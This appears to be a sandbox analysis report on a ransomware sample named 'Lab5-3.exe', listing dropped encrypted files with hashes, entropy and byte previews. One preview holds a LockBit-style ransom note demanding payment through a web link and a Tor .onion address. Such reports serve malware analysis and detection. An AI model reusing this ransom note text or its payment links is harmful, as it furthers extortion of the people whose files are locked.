                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.927507767429099
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4Q5OnR9AYcEVQisny4TSqPcdKqsU4Jl4RsHfUTid3hBaUoSGFcmeykEdEElU92i:4TNQisnnTRkIU4f4hGx0uKeY2ElUJ
                                                                                                          MD5:850EEE5CD503CDEDD08B9E0B5607A964
                                                                                                          SHA1:59B450FE29869C0410F53A530128F3B83BDD23E8
                                                                                                          SHA-256:BCA06E3C70A2809D8ED2D443377F5747D528C706723DB3F43C462969BFD10F28
                                                                                                          SHA-512:1EBFBEE25F6A090A3BD8F690460B0C4C54C55B97C0D64C24175122F813D4EF079C7E0F6E3F4E632841649553CCB7861155D02A1A14AB4E8AC041030EBD89A737
                                                                                                          Malicious:false
                                                                                                          Preview:y.d..K....H0...r?.....r.h.Z..I.b........`:G.....G.......wr.5...8.RL....[.?...|1.M.D~.8.Y.%H.t..~.........F.D>%69."....s[.. ..N{...;4^.n.C...2N......;.U....%..k.C.f..G...7..(<N.p...t....y.hCt6.z.<...#..J."..w.)p..`...#.Q0.....,.1........x.y..;.e..L....k...8...5.D...........H.5..Mo.=...\.-.$n..F..M......c.k..r...1..`...r..'C....<IDb/H]@ z..L.....J....z>^.f...^.C......(.x.i.i..%V....p-...4.w.l.|,u]C.W.S....|piS.m:..)i..o.2.....+..D..`....h...).^Z.Q[4.[}U.u...,.b.p.O.X.....@..j/U>"~6.%cs ...P....&..w.(Ux..d..&.^Z..G.<..y..-M..l..;..v0.*.%.d.eIAb..KI.0.x.5E}.s!...Q..rT.1...z..6px..=C..9Q2M1....c....Y-.....Q~..=+.0.i..aH.^{)[.=.?e.UQh.N6.K..R...)=..w.\.p.s...YeY.F. ...Z.a%...sE9..+..N...oc.......*....t.".5.{..%.-..n;.l..3../.....^.1,.X<..y.......V...,2c<...La.2/.+.:.+H.D....cn.JQ...%..L.9.j.Lgr.I.h...``&"0...z...w....a..5.5.pU.#...-..v...F.]=c|....v.^....f.6..V...w..%=..y.:...g[..R.....yj.v..U.u...P1.{{..u.r. ...d.......Y.p....5&6oz..g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3712
                                                                                                          Entropy (8bit):7.951612262434116
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:jM+bGjeCZP731F/G3hYwuOt8tGx0uKeY2ElUJ:w+bGje211MYPOSW0Cb
                                                                                                          MD5:D6F003923FEDEFDFDDF27226DBCA8BA3
                                                                                                          SHA1:DB76E09E3DFE19B8543A442C43882EA0EF2949AD
                                                                                                          SHA-256:2CFEE7CC73A3DD153190912F528655837CEB365F6595E2BE9069D4A67CC99CCD
                                                                                                          SHA-512:6D374624757C0BD1A0F91AC7EC6AC2A4BBBE794675D866DBA05D4D4614040896CC3FC199F454605D3CCF4219CA49D12F1E70A00EE5CDB7746CDEE86B1666AD58
                                                                                                          Malicious:false
                                                                                                          Preview:...._<*.F2&.I.9.{..}Y....xnt...../`.8.C...?.SW.....bq.......\.@...}..w..f.m*..XN..s..w..2".ft....z.T.....D...`....r./M.Dw.GO.=.l...y3...?...l.B..B...q..e...R(Z.m..H.K...8.(..c..x...*.........#.p8....i5N.0.&f.r.U...'...y........(.c...t.1o..A..:d...a../....41...k,B.Q.WE7.Q5A...$.1....t.B.v.+.9..d.." ........U..H....k..S.w.>..)bq....Q..=.F=L...q...z.....+p.i.*h....e....K.......T..;E.n?..&.[..P...N.Q..Ap..R.....I>g.wn.ehfH.-C..eCV.~k..}j...aS...E@......Xx|Vh....Z...n....c..=.pA....8.:...T......<$h.W....^.A..$0#.li0......w...f..=4.W...........w.T$.v.a..;TL......)....Z.9I.b ....xyMD%......}...fjBk.ZxL.e.<._.]..)...{...}_y.-...3..x.5,./.8=.6f3zM.S_..U.b.....&:.[.[...x...Y....3z.........Jc.v...9+.......I.#p..$..o.v..3..-...dRW...s.*...7./.1B.N. I...........\.....#..m`=.VIUkE>.c..k.@>.f2.....5._eT.Lh..(c8.D0..=.%g.q{..h/.%.%b...)........eJ....xg]..bd.@.U.4....yU.la.n.^.[.D.}....ut.. `dc./..%.@`.`.....}t...,U.V.I..b./....yMi...dag%....*..z[P.B.p...eY.9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10704
                                                                                                          Entropy (8bit):7.982881890779738
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:x5y4+/YsTpWMek8i7N2PIraYEFWUpgBCU9xmSLHLQPz9xlP9sztfjD9FS0Cb:C4wXl8krNEJaC+m8HLclPSfj/Stb
                                                                                                          MD5:2FA261F51DDF208C461F0D7A18336169
                                                                                                          SHA1:36AF5B161930F06BD270527A0841603959110E16
                                                                                                          SHA-256:F8AC8E77B9C5D3FD66ABACF0355D8DE7BCDE426ED26CA487065F17FB5A7FA6DC
                                                                                                          SHA-512:CA0ACE24B94E7DD307D410BB66F265AA6044D645ECC616567300491BD85DD126F123F8310B812662FF415B8E4145E87F417C3B5A96D4EE92E1146EA8AFDCAEB1
                                                                                                          Malicious:false
                                                                                                          Preview:..d.A.".....GI&.[...$)s.+.'..v....G...b.N...|%X=...p.....v.. ..Y......na..{M....T..@....e.p".....r.{....g...eLr!...FSx...I.....A).9.vF.....I..0.c...M..q.CGDb...k.^...*~.gIZr......l...z..)]....Oa.hb..G.'"..T.-W.E.I..JM6..G*/W.YD4.RN!....[.i,....o.@...qZ+`..%n..Q.P..5.I.B...z:..8....Y....E..Q..$.fD....VaQ.b.d`.....Z....q..a`.Nz......4.SQ?.....!x/.3...Q.{%.....@..\(.).g.j..r^....J1w..%..Oj.2+...e..:..$}.k8....%.3....o.p.F...DS..C1n.Q.7..2A`.@j`EM1q.....l(....w#.8.QW~....i..}Zh.....0.....6Oz..9.7....]....~.;.=.....G.D.o.....4.nJ.+..rR..m..jWZK..Wtl.U.{...M........t...% ....+.A5...a."...S.j.!.s....._lf;9u.E2.^....@ZE.'.........a..<.k.....1..u4..D........E...'..+..I.t......O.^..T.$U..*....#[-o...D8D...R;..R[.....82A4#....B9.!_Y4....z>nd.....z..oA..NT6.!.|.tt.....M%,...G.z.s..../.OE.......4..y.....4Rn.)pS.....O.3G0..R.0|..eh..4[.I..L.ZK*......1?...`......-.oA...2^zi.bk...Mc.....".*..o.......I....R6.l.^d.b.ImI.....WO..A.._W.$...38_.iA..j.wP]=.DM'.zzG...W-;...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11488
                                                                                                          Entropy (8bit):7.981994813656937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:wrtVF09tgz0rltOpSzuRumzVkin13TLkkx5b7Ei7PnIt93Iwdr0Cb:wBYnp4pSzuR5+c5TLLrdjnIt94Otb
                                                                                                          MD5:C0F89EDA6C084A1175BD065192BB4CBA
                                                                                                          SHA1:3A98678B5A91586C8126A6CF57F6F6D724173945
                                                                                                          SHA-256:D7018C1735ACBB609E07479A9C826F92588C87C9D08963136276DB89B771D588
                                                                                                          SHA-512:A6CD370D8495EA70C9D41E1A4536199B100E13C62BFD60D1C322A9B3EB5456F7A209C4FA8ADB9FBCCC3E0DD19006E11218144A3E9233671C1A8978757BBBC0BD
                                                                                                          Malicious:false
                                                                                                          Preview:.D....m..f....%5...3."?.a@...G.H;..q....%.f2f4.[...b.<T..c..{1=G.8f....}j.....(e...A7..T.s.H':..t.r.:.....x.O\.73..J..vy..c../.m...\zf.A.W.=...|s..$+.k.K...|.{....%...Y..&...&..6..31.A...j...Hom.).......aGc..._/..R...J.{.~P.;3..\..6K...O.g...6..k|.[`r.U.?.8...K.~r..=.c.lX..l..h.c.ME...i.:0...*........-.vk58i...w....7......Q...j.;..,].l.}.vt%1..O ...h..S..+.@....l@......B/dC....:..@...Np..E\bq.....O.....X....}..Gow|..&.m..[.sg.......p........Tc..]....l.J...@.N..8aJC<.,.P......Q...'.3nd...$....[..dLK...s.<q||#.?....3.'z..h.G7.%.W....G.z.S.#....?.H..V....pW..WH...Z{..r?:<"...m.....5.2...."/z...Qz..y..K..)^M....$. ....U6P/X1x.i.F+...~..G..0t.h,.....a.3..._|E9.>..2...&......R}f.C3.. ..}..$....m..A..^...`.....*I?5X...S.....9..g.%..F..&.........y0.Y..d..c...........I..*..I>.-3..U..q....#..uz....(....G...B..1.vG2^R..H.....k6.Q...%..#.a..V..'~.....tS.|..z)5..N............mn...S..e.......w....v.....g.-..{....#..m..:y...u........,....D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21664
                                                                                                          Entropy (8bit):7.993019569944928
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:4KZbiMZx/W4Td0EAABDbB6KvZI/FrMj2AEOHaIMRnS+H5QyFWRuBl8VixRQ2tb:4KWTSBDjCNgxxUSw5L0wf8VeHZ
                                                                                                          MD5:8240D7A2FBE40EC023BEA3DEC74D01E9
                                                                                                          SHA1:5370B77EECF143EE153121044FFF26E4E4866006
                                                                                                          SHA-256:94186FFF2DF65446C3E8F54C7C2F6E0692332F0EA39FA9C96201749392B3D71B
                                                                                                          SHA-512:1DC05DFC17FBC4564E82F48CCB5FFBF87CB9F7246C23B0DF4F29171C8DFFA90D75AEFA1C585669020A88E755C155FC80C6BFA38036B2AC696143EE6DBBEE7802
                                                                                                          Malicious:true
                                                                                                          Preview:.f..3Fz>.V..H..s.v>J|.z..^zG+.w..>..o. A.A.3.O......m.}.Q3....v.t........L@.-cr....?....\..Ak2;Tz-.*.d%{....x...l4W$..5{.....(I.'.*...c...$.....F...9g#...4.Q.tv.s....`...m.X...&I...l.....O(...8.x..I..MlY...W].$..}...*enn......I.l.........r..+.uKwN..N..TA..{......Y.?.eR.-0.=...)SD|....L}.`....0.....!u ...^...].O..g...K.e.y.v.R....N..5.....'...g...%:W.?..I..W.3Di.."$....f.y...K...9.,..T.3%.o.c-.@.G..../...LM.MS...$d...e9/=.....X.*..........7....v...%.cQ&...ya:.h.e.B.X.cg....K...B.W..7.O..}.q.O..<q.D./.....C.......*%..N...E.VeSA...4........u.&.K.O....9>......x]:1.s.Y`?w..e..........I.vK}F.J8;...b...Y.z.......%.|a.w~..U\.b*.."..i....D..g........O.....W.J.'.Iq...M'.o......._~.Yv....=..Iu....P.....R....+..V...?.5..al..j..:2].y......].X...=x;..JrT...-PT$`..o.@?Y=.^........0).....T..V........H:.....!}.../Jx.....XC.;.T0l....FY.d....UT:.6.#DP.!R.1b.*..p..-{......x..^...H.....[...d...k.!bU....I.U.(m.@..Q.:..e..aw;24...%..&5....!..P.F.3S...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.89670726937172
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YwjVmjH3Da6WMYHfUTid3hBaUoSGFcmeykEdEElU92i:YPDa6WIGx0uKeY2ElUJ
                                                                                                          MD5:01FA2D5A41E54C793D8945647892F612
                                                                                                          SHA1:4595061E38176FE64E8CB49848452F963D3611C9
                                                                                                          SHA-256:C09A3060A9EB88B87056ADE56F26DF16F7B54A448002E52C1DECB7DFC6D5E43F
                                                                                                          SHA-512:B46B2E67F6CE804FD76897959A67F7675E1ACBEE3DD6478B3E2A2D57A04CACDD4BF10839874C3A5767AEDF22F4906ED37490206EFF24725B7F0380E85D0F5D36
                                                                                                          Malicious:false
                                                                                                          Preview:NB{.Q[m"v..Qoo(...([EI..M..M%..l....MH...;.t))>..v..W..^uY.v.r....PH6....3..8.....$..!'c.c..9..u ...o..z{.z...o..p..f.%?B1M8.A.NP..8.S...~.^..0....r....*T..%...6..*0....l}N/J.>|\Z...oe!....D.Vr..s.J..{5V.......g].A./.K.R.O.T.r..^.H|.~.q.|R....1.KD7..f...(....>...ku.. .:..s.m....G..X}.C...W..\...@zxQ.._..}.+...f..?.y2...Z%M..-......T..o>'..y0..K4?KI..s..u.~.k)g..!..0.{. R....v.4..\][V<..K....^......G..Ah.O..U.lAo..[4..L.:.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15056
                                                                                                          Entropy (8bit):7.990396695937578
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:UWbQlVIziWiEyQe0SZewW3JSMqiFyhosWGtb:UoziWtA4wCFJyhozGZ
                                                                                                          MD5:051F9D42F8767563FD8DC11FF9CFFCD6
                                                                                                          SHA1:BEFFA48877E8D6870FCDE7086DC7A7D52420A91B
                                                                                                          SHA-256:4962B923B3F273C89AD553749866BC199A71FA7B07698B3379A0B8AF1D4A9318
                                                                                                          SHA-512:587F3A9E5C78EE9E8B6B998A61E45B849FB80301929CBE2516BF73736E5D0267A387C3826F41E2384A060DDC23271730729F56699E16E2D1F735036E5A1DEBBA
                                                                                                          Malicious:true
                                                                                                          Preview:...P..8.K...aa...Ov..5..(4..*e.V(...a@f.}]<....j.N.0...zX#J!......4k.......$..Iw.n.....Y....r...s.......'.L..`..28....b..........Rd.8.(.....@Phz...Q...._a..L`oY.........Vy...`.!.N..H:.....{6.8D.KbA{ZLn..=....8*9..\....|....uJ9[fl..T..U&.-..IO...`P....k....x0&!...w...13...i.0;g...Q.......G.C.(......I.^..Q.e..Wd.k+.....c....R....+.[.....?..W.k'.Df......s..i.....Q...E...Vr..Hlb.q.'._~.....=...^Z^ G....gH.Z....9.^....{....{....\+.'..*...A...[..a.....".7...hC..v...+....;z....}.Q...w. .......RIh.z..O.7.=i.E~.'shG......%..........<..V.!.....Q,."..ZR'......G....e0#..p*....2.P.m.*5.R*.G.f..6.......1[.V....?D....s.<...I<...F.eWu..........x.....fn./(.-..L.../.:..$O#.....-...<.hK....,...v.vm..o.nyk.s...p....X#..]x.%.:+..b.=2.S..o.)......%nl...a..4c..>f.h...D....G3.V..gy'......h..r..3.<....7(.i.._.bT!..e.O..,-...R.hv...^.....u....mIU.....H.....%3.;#..{... ....O.^+S8...NH....2..p)z....@.}{..o...f.G.8P.!.+.w...@....}.4.!....*:..6].
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31280
                                                                                                          Entropy (8bit):7.993356680950434
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ENiNCB2VDN5mHXFBHeMtbU23yey/DJYl5QS/bRVL0gbZ:ENioB6HcXFFaeEKOSDsgbZ
                                                                                                          MD5:273586C5A03D268039DDA3A5C04ACDB4
                                                                                                          SHA1:9AAD262E238CE9C5FA08F1AA4EA4E56E2E1C97A2
                                                                                                          SHA-256:9A37C5EE5D1457FF64232CD674E834CF0384431268CD734E48A6E127F0630319
                                                                                                          SHA-512:432BEA62D6858AA1CEB6E636372BCB95FA00FA1BC5AB5DDF091C5C8593798A1C79915D3DA29F1C62C9AF6AF92CE99C92B61E2D9849EDEDA8E6582A208D322DB9
                                                                                                          Malicious:true
                                                                                                          Preview:].N.o.@..Pf+..v.R9W....d,....1P..L.n.L....i....({.7..k...}1.E{z6..hK.....".b.q.5.<....M2.Yp ...MI. .....*s....~...e....V..r........U.n.1....A....fF..6......./6.-o...-i...}.[5'V.r.....X.l.o/.......pp..>Q6.Q~..wX.uE.l.;tQE\{...c..... ..f..6tK..2g..<..p...TZz..\...V.....Y*.i\.....i...>o...tu...K..Y..v..3y.U.b..J*9.......\.....b.w=.l=...7......0.J...I../T....P|.<.H.Wx.....FfEs....0c'.....p.T.P...I...n...d..\Q...j...Z7...MG....[A.......@V.-C5..Q.B%Ip...9..f......I.....{..s.5.m...$\...3....Nw#yW[.!.5......p......"r.;..._..w.....e.. _...WA....#Q{..$..5.\D5....~..yJ'.<j.*../....x!.... D.R.lf..N....si......Zyw....jx..#.l|x.Q..wH...k3."....~v..3.....`x....-A\=/.9.V.AEx&.~^.\d.*.B.2..6.....?...Ln"|.O..T3}..1.k...'$........o'.n.vZ;.}.?..c.... ..c..n........([;../.....:{..6.C.Oh.......(].E_'..DTS...%<...\.c......w...dX........3..us..rL....v7.B....i.Y...E}M..3..4..37...x[G..t..zUU...~....xX..:..r!;".Z..z...J....crz...^.*.F.(.k..Nid.,......<.<..e
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8224
                                                                                                          Entropy (8bit):7.979849575987138
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cdyUFJNlgAQRjSz1F6aGawr9a2iLCZVS0Cb:cdx9lGwF6a9a9alLCytb
                                                                                                          MD5:0E1C97D1DAE1C357F6EE00925165A3B4
                                                                                                          SHA1:DD2D9353065224A8DE9F37705F0472D957AA3562
                                                                                                          SHA-256:5B273318C8BE66E0F556E05ABC226F3405AEB0B8098D0285250910F7AFB572C0
                                                                                                          SHA-512:E1851C191DC4BBEB6B4EE2DBCBE3D21CEDC713DD868B49B06D568994E78E5F77B5DBED087EB5C390A47B2D6556C6DA1B9CD48C2777C3270F1D56A4F7334CEC54
                                                                                                          Malicious:false
                                                                                                          Preview:p8sf.......`...ZyC.#L......V..5.^.;ZB....<*.w.iDF:-....pS.d~s...}e$+..........O,..DU`...0...Lg......#.d..[.....y.Bv<.{).]..[...`......F...X..._.Jic.B.t....H.|W<....`.3*.T...&....t...Q5.98..yL..V..p.9KF.[..@....^.H....^7...W....4....|H......S......HOP..t.c..t.r.%............z.......F6..G....;.>2...r.jP....N#...Q.u..=.'..3.L.L.#.Q.P.+h.......k.....3.Hi ....1"..#T...a..(.,...4..%.F...;..S..")._;.|..h.L./..m..0>..i.N.p.......::u/.o..s\.+......w.4.GQI$..o ......nZ..~G..y.i.0(.f3.p.NtL..R.kNW-.p...#.2.X..7.i....$...T..w..@C...C.S.<.?p...t`TO..S+. .)..%..W...5.*.5..a..........B0.......+>....].....2. 0zF.bV..h.P.DP.%.....nM5.B.N.....q.-.]c..7~.40V.......U9..._...1..0...$.'.........!.V/.~..7.a}.....s,>.H....x....../.C....a..C...\u.6..UZO..%..E... ....!......MA..1.S..........|.L.L.Hy..........-..O`=.kQ.-=. \..y.j.......G.......Oo3}h.9...;..i/...`l'Y........H.....>.......5......g{....zt.Z..~..`.|S.6..^..jw.....x..:......R.R.J..%$........'b..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1936
                                                                                                          Entropy (8bit):7.913635555723869
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2FC5bR8MCjuHfUTid3hBaUoSGFcmeykEdEElU92i:2FsR85VGx0uKeY2ElUJ
                                                                                                          MD5:EF48FAF8A2DC7A47D6A552FBFB581520
                                                                                                          SHA1:33CDF6651E85B25F652DF88B77272A5CF1217061
                                                                                                          SHA-256:E9CD5C5D8F0A2ACDAFDE5EB58AD49EAC3A8817C127BDFCB4B7F83F1F3EE4EBCA
                                                                                                          SHA-512:9345A69E806C3480C6DA0A3950FF9313F8D6ED9C8C55E4C6A9949343E6662BF6A7A755C983616EFEA4671EDF7A73B26FA97B59E0AB51149A4F17F5E6C59ADE28
                                                                                                          Malicious:false
                                                                                                          Preview:..'Xt...y.$.JlI.3}g.'..pT.x|....Q. i.PK...&l .v.+...e.......W...s.p.e..~..U3...7........*.1..E.....Ho.7..5~..kp.r......0.]...Y.]:.Ejb.oB).1....B%.Z...d...Oh.0s...^].._.:.....^....Nd,.PV.2 .=..2.6....F.O.h....GpU..+..TV .4Anc.=M2..e.7.{..+..K&.@\e..q......S.#:............t0.qt..G9..J...6...4$....~GgY.../.m.[}..4.P.`8..p.......h..&..i...H.Y....D.+H..`b`B..a......nsI.k.\...u..e..w..6...EX.4.W4..Yc.......:..#L.../.Yd...z#..F.$4d....w...U[......Hz....s.....c....`..|."...v.A)./...Uq.I,.C.C..l.....,.b..Bn....?G.R.U....I..D..+&x...OB.>9..S+_<.v[b.g.C~.....)I....X7.k.2...l.9\.0e...'LzH......w.4s....m.#L l#`...:..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):7.91785351432454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DbaWFdwIl1htQDHfUTid3hBaUoSGFcmeykEdEElU92i:/nHwIzh2QGx0uKeY2ElUJ
                                                                                                          MD5:1170908AAD0C92C805118A89C09E028A
                                                                                                          SHA1:68EC842A3B53CE2F7C2429E4503A74C64B977797
                                                                                                          SHA-256:4C2D6DE8BF3CC3F836DAC5605A193AAABFF118A8EBC9D9A2379A111135A04D25
                                                                                                          SHA-512:4DC7A112977B041915F4F29CD3306C9A6FE7C8EE8E8F804F157F2BC4F392253352367385E9361F512993165ADA19B5DA694D7C80EEDBD5CB589B29A0239A0C06
                                                                                                          Malicious:false
                                                                                                          Preview:N..{<.Al.....:.63J.YY/...v......r.J...bO.0...+...{z.j.1..F..T.2.......H.h..............a.....nQ..I.\.....\/H}.^.....K......._.....i...R.:o._.+_+.E...b.d8...;<^.=q.;....m<....E!v1I.$$N.r.......Y.E.a.e.w-....2. ..f..||.A ..#'B.R.K..3q...je....p.....+;#X.vd.....@....4..b<].+hpS...7.]Q..?..ea.w..q..@-..../..Kp...3.OI.....+..f.....Q..}(4..]I...a.-.pp...$V.U......H~..[.'..x.........L.h1A.k......!a$..i....](..3I...Z=nv:Mb...@.Fp...r*....R...M.. ...;S.'"..yr.c..9.a.lb!qyG......V.W.]....>&...%Q!.....ih.......@Z.-au..%^E.M....e..\.">.c!.[....Y<.....j.e.8........A.q.s.*u..'D..]...Rv.W0{z.T.d.....s.....A...+]t..[8...:H3"......y..~V........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2032
                                                                                                          Entropy (8bit):7.912325875468815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:D3FVK9JqpFTNNh/X/HfUTid3hBaUoSGFcmeykEdEElU92i:D1VcELNCGx0uKeY2ElUJ
                                                                                                          MD5:A1BAF974D7144F818995E51F536C4F9D
                                                                                                          SHA1:682CD31E5238E151B4445E2FB01BEC42A44D2D38
                                                                                                          SHA-256:D87BA8614298491792952CF980171F5513C4ACBD0EAB27128C4724569362959D
                                                                                                          SHA-512:54A339D54C8B1A5158EDD0EF01432D213D711C972E4083C40C14C9ED860ED80B1583AB02887C8BB2CE3AEF4E9B825CD5C38468B85309C21D89F68A79FC956DDD
                                                                                                          Malicious:false
                                                                                                          Preview:Z...Ox.(..."..c.aWY9...H..o.d......].2C.F(...+6...kZ,.))[.Hy.U8.......iu...)5'.h..Ye.tD.Z..C....R9..|.....Nw\Z...hO....!....7.S.;..$eq..8B...{.q.....>....FFsu.....|.c.@V...fe...{..s3..k.y....H... .g.."?....... )%..Z.%....Q.x....B;..R..nY.A..H]....;h.V=.|....NU4......H.2...u.M.Iv\~:s..h....E..y0......v....WtC..A...h..u_./.~.........N....D8..a.XNCwz=.3.L|*JE. _.Q.)....0O.....p..........72.L...ew......zZ..i..#!ru.6(..W.q.....N...7.....u.._FVh..ga..*....;......8.....S...J....3#$.O....ow....3O..F.)"...4p....]p=..._T...'x...H.:.."v.W]...fgF<'.Z..b..Ab.IP+.|.....R7.}.].5.5.L....H+!~...S.h.lL..h4h..G..:s...I".]AG..2].b0.>Mhw..H...f.y..n\=3.i.$.,q...Z.Y.....jlm.&t8.3........}..C...S.,....J......;.H...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1824
                                                                                                          Entropy (8bit):7.899745458899721
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Q7D2jd7oEAcHfUTid3hBaUoSGFcmeykEdEElU92i:g+7odGx0uKeY2ElUJ
                                                                                                          MD5:01FDAF691971962C253B98103728AE5F
                                                                                                          SHA1:83AE1DD752130E0D4BBBFB912788034741610F92
                                                                                                          SHA-256:32213C03FB855BE99CB78C68650D9D9035B9321F14C3FC59F25AE78EDBEA1456
                                                                                                          SHA-512:328504D8DEEB584065142BDB7839FBF1E997A8E98238B1122F7F3CD051843F65E5BD49F74F52AFAD101E7B8E8C5E1A83460B907608BDDF1FA16E5E357454EB01
                                                                                                          Malicious:false
                                                                                                          Preview:.I...P...*S.....2y.PR^.8...L3?H.@...S..|;E.]....2.g...T.3..{+N...PSmp?.3.-...L;.:..uh).BI.d.(. .P.`I".-..AE(.f..6....b..}..,u..D...9D6.7zWj.9.oLtb..AJ....../..a.u?.Oj....Wi.....[..0.<#......3........oO.X@.pCB...S.IZ>.\...T ..n.q.dL.0.J.v.......C....Z=...DH..U-..@. ?.@f.z...z....L.....V..!.!Z.....&..x.~.hC29@..p1..2......h+2X.=.{.........`....=..N.q.5..e...J.Y..o[..d .O.._.Or..S.....\Z0{.u......s ..A....r.+........H.wm...9.....N..q# ...*S..L6......!..B._v...+..)..X...i..H..5.....wd2E.>..UKE.i.."...`I&......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1728
                                                                                                          Entropy (8bit):7.890848235141154
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bg7Z/cm4j2iwHfUTid3hBaUoSGFcmeykEdEElU92i:bCcmgGx0uKeY2ElUJ
                                                                                                          MD5:4BCA7DA70A5F73CEBD9AFC8713FA2652
                                                                                                          SHA1:5F3696979D6E2BC2F4DDF5A9AAF669FC64BFA1CD
                                                                                                          SHA-256:8DF4D7C25CEF547C276A401B72B3F3EFD22E7A79A6A5EE41CB087C2529789D17
                                                                                                          SHA-512:F90AD7AEC61A74AEFC823075180BCAA2B2526B0B2E1B9B7C6B0DB5B8C66ED0B9BAE57C2189037B40E499ACE5BCFA4FB033CB50778A5E83176EC16B3CCB7E6DEB
                                                                                                          Malicious:false
